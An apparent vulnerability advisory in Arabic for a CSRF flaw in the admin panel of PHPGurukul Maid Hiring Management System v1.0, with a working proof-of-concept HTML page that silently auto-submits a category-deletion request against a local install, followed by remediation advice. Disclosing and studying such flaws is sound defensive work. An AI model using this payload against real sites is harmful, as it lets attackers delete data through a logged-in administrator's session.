
دليل إثبات المفهوم لثغرة CSRF في PHPGurukul Maid Hiring Management System v1.0، توضح حذف فئة غير مصرح به عبر روابط ضارة مصممة.
اسم المشروع ورابط المستودع: نظام إدارة توظيف الخادمات باستخدام PHP وMySQL
نوع الثغرة: تزوير طلب من جانب العميل
الإصدارات المتأثرة: v1.0
💣وصف الثغرة: توجد ثغرة تزوير طلب عبر المواقع (CSRF) في لوحة الإدارة لنظام إدارة التوظيف PHPGurukul، مما يسمح للمهاجم بحذف فئات التوظيف بشكل تعسفي عن طريق خداع مسؤول موثوق لزيارة موقع ضار. يمكن أن يؤدي ذلك إلى حذف البيانات وإجراء تغييرات غير مصرح بها على مستوى المسؤول.
👩💻التأثير: حذف غير مصرح به للفئات.
🛜إثبات المفهوم (PoC):

/admin/manage-category.php
إثبات المفهوم لـ CSRF<html>
<body>
<form action="http://127.0.0.1/mhms/admin/manage-category.php">
<input type="hidden" name="delid" value="13" />
<input type="submit" value="Submit request" />
</form>
<script>
history.pushState('', '', '/');
document.forms[0].submit();
</script>
</body>
</html>


التوصية: تنفيذ رموز CSRF في نماذج المسؤول، وفرض ملفات تعريف الارتباط SameSite، والتحقق من مصدر الطلب لمنع الإجراءات غير المصرح بها.